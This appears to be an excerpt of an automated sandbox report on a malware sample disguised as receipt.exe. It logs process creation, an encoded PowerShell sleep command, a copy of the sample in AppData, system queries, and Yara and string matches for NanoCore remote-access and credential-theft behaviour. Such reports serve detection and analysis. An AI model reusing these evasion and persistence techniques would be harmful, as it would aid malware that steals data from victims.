            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
            Source: receipt.exe, 0000001A.00000002.605660341.0000000003277000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh
            Source: receipt.exe, 0000001A.00000002.605660341.0000000003277000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: receipt.exe, 0000001A.00000002.605660341.0000000003277000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Users\user\Desktop\receipt.exe VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Users\user\Desktop\receipt.exe VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeQueries volume information: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Users\user\Desktop\receipt.exe VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\receipt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPED
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPED
            Source: receipt.exe, 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: receipt.exe, 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: receipt.exe, 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: receipt.exe, 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
